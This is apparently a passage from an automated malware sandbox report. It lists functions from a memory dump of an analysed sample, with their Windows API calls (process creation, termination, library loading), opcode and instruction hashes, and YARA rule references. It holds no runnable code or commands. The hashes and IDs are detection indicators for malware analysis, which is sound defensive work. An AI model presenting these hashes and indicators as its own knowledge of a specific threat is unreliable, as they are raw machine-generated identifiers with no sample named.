                                  • Opcode Fuzzy Hash: 0f63cc28b551a690449cf47fe28b567e8e7800c74c0e9b40ccbcbbb47625eb18
                                  • Instruction Fuzzy Hash: 8A41F32053A643CEDF14AA9084807F423609B523A4F999762CC4B57BDDE3A9C4DBCAD3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0228100D, Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c2c6cd6d21d610486b8d686f67bdd60c0192401e9a73cfdeb08ba88d213c1b67
                                  • Instruction ID: 065438660a5fe8df6070b3b22a91ff664b3f7394bcb5525bf52724b41575837a
                                  • Opcode Fuzzy Hash: c2c6cd6d21d610486b8d686f67bdd60c0192401e9a73cfdeb08ba88d213c1b67
                                  • Instruction Fuzzy Hash: 8241762453734AAAFF3436E84CA57F912676F52360FD4810ADD9A970DCC79AC8DAC603
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022894F3, Relevance: 1.7, APIs: 1, Instructions: 153COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 492f1e1300c0b106b94207cb42eced3cb50d33cc4c7194ce20d5c8d63a739212
                                  • Instruction ID: c6a16d32fbc6e45005676997a0794b0ef5082059afb71115619c0b75124c5b3a
                                  • Opcode Fuzzy Hash: 492f1e1300c0b106b94207cb42eced3cb50d33cc4c7194ce20d5c8d63a739212
                                  • Instruction Fuzzy Hash: B841D32053B606CEEB24BED484903F823919F563A8F989616CC4757BDDD3A9C4CAC682
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022810C0, Relevance: 1.7, APIs: 1, Instructions: 152COMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 0228439F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: 516d7a5659c2d42a9e5ebbdfd926b7a42d9d5102bc2d4a5e1b2cc4c9ce7b6f9c
                                  • Instruction ID: df7327b0f9b0e64bc7c1f89ef8d015c7bc1a1c924767916697a7919d3bdf58ad
                                  • Opcode Fuzzy Hash: 516d7a5659c2d42a9e5ebbdfd926b7a42d9d5102bc2d4a5e1b2cc4c9ce7b6f9c
                                  • Instruction Fuzzy Hash: 4041761462630AAAFF2034E448A17FA13576F53360FE48216DC4E475CCD39AC8AB8A43
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0228940A, Relevance: 1.6, APIs: 1, Instructions: 146processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(00000000,?,00003000,00000004), ref: 02289B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 52ec0a78c6aca78ab841eb746a783282cb3121af7397ca30b2b480248b7a8ca6
                                  • Instruction ID: 509e8a37c4b40fc4b4a41de0888bda67ef1c6026945daee8c4e54be543885bee
                                  • Opcode Fuzzy Hash: 52ec0a78c6aca78ab841eb746a783282cb3121af7397ca30b2b480248b7a8ca6
                                  • Instruction Fuzzy Hash: 7741D32063B207CDEB24BEE4C9943F823929F56378F984616C893967DDD3A9C4C5C642
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02281126, Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1af6cc24116bc6c453dc78a50e1e5be789a1f660893baa48b6d3797ef9207ea8
                                  • Instruction ID: f2a18671d372170d7912bc3b851d4502c62fb337617adb6764ca00f57e960f18
                                  • Opcode Fuzzy Hash: 1af6cc24116bc6c453dc78a50e1e5be789a1f660893baa48b6d3797ef9207ea8
                                  • Instruction Fuzzy Hash: F8316A24A3630AAAFF2174E048617FA27575F43360FA48215DC4E479CCD79EC8ABDA53
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022811C5, Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6c98721d4699c66bdea9f697af888bc680895f45c5fc90e1e0e715525871cd96
                                  • Instruction ID: 9ba2a3d2a5afa6c90a5e8677680804f4a90e669f1ed05e5994ee675cd837d82e
                                  • Opcode Fuzzy Hash: 6c98721d4699c66bdea9f697af888bc680895f45c5fc90e1e0e715525871cd96
                                  • Instruction Fuzzy Hash: 3A41CE2063634BDAFF2135E458617FA27525F43360FA48255DC4E0B5CDE3AAC4ABCA43
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0228956E, Relevance: 1.6, APIs: 1, Instructions: 136processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(00000000,?,00003000,00000004), ref: 02289B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: c11c02eb49225d69893ea96cc10c4cf6c6c2f77ab4d8afef73cfb04eb1a39e6d
                                  • Instruction ID: 2810426de405530bb306b538f43dfb7ca672204ae95b1cab9347dabd9abd0f15
                                  • Opcode Fuzzy Hash: c11c02eb49225d69893ea96cc10c4cf6c6c2f77ab4d8afef73cfb04eb1a39e6d
                                  • Instruction Fuzzy Hash: 6741012053B602CEEF24BED0C8903F423919F563A8F984616CC47977DCD3A9C4CACA82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022895CE, Relevance: 1.6, APIs: 1, Instructions: 135processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(00000000,?,00003000,00000004), ref: 02289B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 36371516cacacfbee15ce7ebeb3236ef62695f129666d09dc341049c16c99b95
                                  • Instruction ID: d981f9b0bdf81df2fed95902fe16d8e53b7a30a322bf1a262cb6d422ca08c119
                                  • Opcode Fuzzy Hash: 36371516cacacfbee15ce7ebeb3236ef62695f129666d09dc341049c16c99b95
                                  • Instruction Fuzzy Hash: FC41E32053B646CEDF24BED0C8907F423519F563A8F984656CC4757BDDD3A9C4CACA82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02281177, Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 0228439F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: 450cf11813cd9143dc2547f8919993662f879181382e61ae1ff02b2d2dd475b2
                                  • Instruction ID: 9674f180ab86391b8b6513ec0c8e2976dd72dd25b35ae6e1fa684a94fb24859b
                                  • Opcode Fuzzy Hash: 450cf11813cd9143dc2547f8919993662f879181382e61ae1ff02b2d2dd475b2
                                  • Instruction Fuzzy Hash: 9A316810A2634B96FF2174E058617FA27475F43360FA48216DC4E4B9CDE39AC8AB9A53
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02287320, Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7ec3ae3c60a3e5c0045358635352ed19e9b9b3648616ef6089a80f29785c0b5d
                                  • Instruction ID: bcf735fad778c555290cf8aacd607017a4f3a9eb76a1b64d6a972bf44d2e1278
                                  • Opcode Fuzzy Hash: 7ec3ae3c60a3e5c0045358635352ed19e9b9b3648616ef6089a80f29785c0b5d
                                  • Instruction Fuzzy Hash: 8E31E77D636306DBCF14FF94C990BBAA761AF14350B748129FC4A9728DD7B0D840CA92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02289670, Relevance: 1.6, APIs: 1, Instructions: 122processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(00000000,?,00003000,00000004), ref: 02289B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: e529102f4b47ff8cc11cc50d237e36ebffd1243e4fa604196c8a2af7ec13877c
                                  • Instruction ID: ef945ec6b41afdddf9a8c112d76579919e7325187e275e674c61ea6d53e28381
                                  • Opcode Fuzzy Hash: e529102f4b47ff8cc11cc50d237e36ebffd1243e4fa604196c8a2af7ec13877c
                                  • Instruction Fuzzy Hash: 3231E02053B603CEDB24BED088907F423509F563A8F995656CC5757BDCD3A9C4CAC682
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022896A6, Relevance: 1.6, APIs: 1, Instructions: 121processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(00000000,?,00003000,00000004), ref: 02289B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 5ec992aa34f85c90cbead78e2731f6027c7efbf6c29ef122c7879227163359cb
                                  • Instruction ID: 1ec84c3e0f8b762bbdd39a7ec8de3c95c2fae2b367bde04bfd45a7fbd8ba459c
                                  • Opcode Fuzzy Hash: 5ec992aa34f85c90cbead78e2731f6027c7efbf6c29ef122c7879227163359cb
                                  • Instruction Fuzzy Hash: AC31D02053A602CEDB24BED084907F42351AF563A8F999756CC5657BECD3A9C4CAC682
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022897D6, Relevance: 1.6, APIs: 1, Instructions: 120processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(00000000,?,00003000,00000004), ref: 02289B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 0e9de81a6d974104f790a36eed7976d56b63978c4ac7a5aeca8d48f92e060229
                                  • Instruction ID: 04024a5f984fc93b46356a3fdb4e8e51146447078cb266d0181969d2f7ea3bae
                                  • Opcode Fuzzy Hash: 0e9de81a6d974104f790a36eed7976d56b63978c4ac7a5aeca8d48f92e060229
                                  • Instruction Fuzzy Hash: 8531C120526647CEDF14AA9084813F437609B463B8FA99761CC4A17EEDE3A9C4DBC6D2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022896DA, Relevance: 1.6, APIs: 1, Instructions: 119processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(00000000,?,00003000,00000004), ref: 02289B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 532998333e3f8c356bb44f8f138e832297342123188638485d288c2b0953b487
                                  • Instruction ID: 1ce893eb665a8e2b742d2f087e81ab6e0946793c1c0989c44e64cded5052adb2
                                  • Opcode Fuzzy Hash: 532998333e3f8c356bb44f8f138e832297342123188638485d288c2b0953b487
                                  • Instruction Fuzzy Hash: A531F22053A602CEDF24BED084907F423519F563B8F999755CC5657BECD3A8C4CBC682
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02286FCD, Relevance: 1.6, APIs: 1, Instructions: 118libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,022804F0,00000000), ref: 022872E3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: b6e254c0fbe6b912399a601ad938dba9488c840b1db97a2f24f4590c4056a726
                                  • Instruction ID: 269d6a55f4ccd25d836c2f8b4c5bc74c8e9c8ee0f70508ae2f954383a1b69431
                                  • Opcode Fuzzy Hash: b6e254c0fbe6b912399a601ad938dba9488c840b1db97a2f24f4590c4056a726
                                  • Instruction Fuzzy Hash: 4921F548A3A747D3DE1479D050416FAA7105A632A1F748B6ADC0B01DDDF698C02FD9E3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022811E7, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 0228439F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: 9afc6c94b9abf6e3f3327de9b2444e95898af87f1bea8e4cb4ac04cf72e1aeb7
                                  • Instruction ID: 732b9213af7aeb9fda439c16650f999653bad5396862e39bee50767eeccd03a4
                                  • Opcode Fuzzy Hash: 9afc6c94b9abf6e3f3327de9b2444e95898af87f1bea8e4cb4ac04cf72e1aeb7
                                  • Instruction Fuzzy Hash: C9319D10A2A34A9AFF2134E498517FA13475F83360FA48356DC0E4B5CCD39EC8ABDA53
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02289713, Relevance: 1.6, APIs: 1, Instructions: 110processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(00000000,?,00003000,00000004), ref: 02289B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 2d9c3341b45f9d15a2c3f5368bc9a2531aecc91d09671448d4a8a9c41dcbe263
                                  • Instruction ID: b5129a77f2c94980b025f0a4b0a3b11178a1b1a8178ae64c431837352a87ea35
                                  • Opcode Fuzzy Hash: 2d9c3341b45f9d15a2c3f5368bc9a2531aecc91d09671448d4a8a9c41dcbe263
                                  • Instruction Fuzzy Hash: 4B31F02053B603CEDB24BED0C4947F42350AF563A8F999656CC4657BECD3A8C0CAC682
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02284D29, Relevance: 1.6, APIs: 1, Instructions: 108libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrInitializeThunk.NTDLL(00000000,?,00000041,00000252,?,02285BA4,?,?,?,00000852,?,?,000009D9,00000000,?,00400000), ref: 0228588D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 15cf8dc723cf0a98d7d63a10ffb357171896f6f74754673dbf2df588b405c934
                                  • Instruction ID: 37730bccecf9b07430754aefed387370845cdcb581776ae3fcac6ae9c735dae7
                                  • Opcode Fuzzy Hash: 15cf8dc723cf0a98d7d63a10ffb357171896f6f74754673dbf2df588b405c934
                                  • Instruction Fuzzy Hash: A7314E316293C68BCB30BFA044503DA7BA2BB46340FA4855EC88F5B689D3748557CBD7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0228122E, Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 0228439F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: 90f1c868171dd458e3bacdaa97eeab1dccff29683e473d0d851be065d82a2d43
                                  • Instruction ID: 029e6f03c15a951b4d0bbeba8fe56d790bbd2865cc235e7ef8d70b2371939863
                                  • Opcode Fuzzy Hash: 90f1c868171dd458e3bacdaa97eeab1dccff29683e473d0d851be065d82a2d43
                                  • Instruction Fuzzy Hash: 75217C1092A34B97FF2174E498513F927465B43360FA48366DC0E079CDE39EC4AB9A93
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02289742, Relevance: 1.6, APIs: 1, Instructions: 106processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(00000000,?,00003000,00000004), ref: 02289B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 3416817556b287a8ea3834cd3d7c42d1780d0ae29205447c8419b055b88f048b
                                  • Instruction ID: f60eaff0e7a9612ddb37c30cb35a9bc9e2a7f44dd55ffc8325a7401ca78d9ae8
                                  • Opcode Fuzzy Hash: 3416817556b287a8ea3834cd3d7c42d1780d0ae29205447c8419b055b88f048b
                                  • Instruction Fuzzy Hash: 8131EF2053B203CEDB24BED084947F42350AF563A8F999656CC4657BECD3A9C0CAC682
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02286FAE, Relevance: 1.6, APIs: 1, Instructions: 103libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,022804F0,00000000), ref: 022872E3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: fde06872390dbd71d0b2e1f0280f5aae34d30b5b32e78305895c04ce813af01d
                                  • Instruction ID: d0dd49a627cb5b229f74e32c439c436ab71b3ec20f36c49a009e1275f083bcfc
                                  • Opcode Fuzzy Hash: fde06872390dbd71d0b2e1f0280f5aae34d30b5b32e78305895c04ce813af01d
                                  • Instruction Fuzzy Hash: A2210158A36747D2EE2075D094406F9A3105A522A0F748B67EC0B51DDDF2E8C06FE9E3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0228977A, Relevance: 1.6, APIs: 1, Instructions: 101processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(00000000,?,00003000,00000004), ref: 02289B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: c295bd9983d6c68cdcc67231b13534c48f6bb1f9c6bfc309a28184e703e33326
                                  • Instruction ID: 6e8ee1af369efbce3ec02de9471313d1010c1b62a58c9d0568dcbb2ed1bdd6d5
                                  • Opcode Fuzzy Hash: c295bd9983d6c68cdcc67231b13534c48f6bb1f9c6bfc309a28184e703e33326
                                  • Instruction Fuzzy Hash: DC31E12053B207CEDB24BED084943F423509F563B8F999756CC5657BECD3A9C4CAC692
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022897A3, Relevance: 1.6, APIs: 1, Instructions: 101processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(00000000,?,00003000,00000004), ref: 02289B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 481e543fc592fc589956d24c0f4a02fe94b5bb00de9f94a784bc1f86e3c69416
                                  • Instruction ID: 667e2271f053250624607da7a94b02a6b6a3f8efbded246cfa2f46370c30dd93
                                  • Opcode Fuzzy Hash: 481e543fc592fc589956d24c0f4a02fe94b5bb00de9f94a784bc1f86e3c69416
                                  • Instruction Fuzzy Hash: F621332053A207CEDF24BED084843F427609F523B8F999755CC4A17AECD3A9C0CBC692
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02286FF1, Relevance: 1.6, APIs: 1, Instructions: 101libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,022804F0,00000000), ref: 022872E3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 2fbaedb71f39169ebb8ef8610096f4484c3781fbe62841e8517618fa11163d4f
                                  • Instruction ID: 67495b33ed0203201b6a976b4101b48af6b9a1a6bb377a4ed336a943ccb5e921
                                  • Opcode Fuzzy Hash: 2fbaedb71f39169ebb8ef8610096f4484c3781fbe62841e8517618fa11163d4f
                                  • Instruction Fuzzy Hash: EF21B098A76747C2EE1075D050406F9A3105A123A1F708B76EC0B55D9DF2E8C46BE9E3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0228170E, Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 0228439F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: 9ab68d5d2435b3df9abaee31cb4932275c723a2576d89d5a0ed4e1c44c9ac7e9
                                  • Instruction ID: 36ecc2878573b4574bd1bbe6c1448d0da12fc258779a91d190749d09de5d049a
                                  • Opcode Fuzzy Hash: 9ab68d5d2435b3df9abaee31cb4932275c723a2576d89d5a0ed4e1c44c9ac7e9
                                  • Instruction Fuzzy Hash: 3721DF5140538397FB0165585C11BF627221F837C4F6A432CDC4D13AC9D3AA982BC1F3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02281281, Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 0228439F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: 03925ee65d996d89a32407cd734fea04930e30dca83eb369934f716962d8efbf
                                  • Instruction ID: 0859afeaf484ec46a032c5032e2397cbf51b3c0afc119c289f44738f3a4cf2b3
                                  • Opcode Fuzzy Hash: 03925ee65d996d89a32407cd734fea04930e30dca83eb369934f716962d8efbf
                                  • Instruction Fuzzy Hash: FF219020526787CBFF227AA444443E93B516F03320FA846ADD44D0B5CDD3AAC59BDB53
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02286FBB, Relevance: 1.6, APIs: 1, Instructions: 90libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,022804F0,00000000), ref: 022872E3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 173a49b210ffae8075cdf2f1fa9336900a7530c51c8870e38676ace43e337850
                                  • Instruction ID: 7988d6097fc86943704b64c43a422147d85c6132c67aaf9e4974dff842b812d3
                                  • Opcode Fuzzy Hash: 173a49b210ffae8075cdf2f1fa9336900a7530c51c8870e38676ace43e337850
                                  • Instruction Fuzzy Hash: 44110598A3A347D2DE2035D095807F9D3514A122A1F348B67EC0741DDDF2E8C09BD9E3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022870C9, Relevance: 1.6, APIs: 1, Instructions: 90libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,022804F0,00000000), ref: 022872E3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: c91019c56d362fca6c72402c7f436b07cb8532ee6b42cae8be5bca6d27664c28
                                  • Instruction ID: 0e020f39b0921e6777690763164547c16274cfcf2c29f3a1984b7056715f7686
                                  • Opcode Fuzzy Hash: c91019c56d362fca6c72402c7f436b07cb8532ee6b42cae8be5bca6d27664c28
                                  • Instruction Fuzzy Hash: 12112985A6A387C3DE1079A060816F9A70049533B1F758BB79C0A06D9DF198C43FDAE3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02287249, Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,022804F0,00000000), ref: 022872E3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 307468cf0c0295d4b551c08243001eec6ef5c29e0847e943f972ddbc31d2979b
                                  • Instruction ID: bec21b0b0aff5b7dc953e503151c3fc0b62bf3ee8b541e683812bb9202a2a5e7
                                  • Opcode Fuzzy Hash: 307468cf0c0295d4b551c08243001eec6ef5c29e0847e943f972ddbc31d2979b
                                  • Instruction Fuzzy Hash: B0112745955B87C3EE00A98020411E97B1065433A1B31CBB2EC0E16EDDF2998A3FABE3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0228983A, Relevance: 1.6, APIs: 1, Instructions: 89processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(00000000,?,00003000,00000004), ref: 02289B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 9f11070d94d4d1533bfdd414353ee453de5d60aa6960a5527744bc50508d6eef
                                  • Instruction ID: ea1a43df193906ba49c9dad7e324d60b09c7153fa8e56522c1712b608d4d7138
                                  • Opcode Fuzzy Hash: 9f11070d94d4d1533bfdd414353ee453de5d60aa6960a5527744bc50508d6eef
                                  • Instruction Fuzzy Hash: 2521AC20536607CEDB24BED084843F823A09F563B8F999655CC5657AECE3A9C4CAC692
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02289862, Relevance: 1.6, APIs: 1, Instructions: 89processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(00000000,?,00003000,00000004), ref: 02289B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
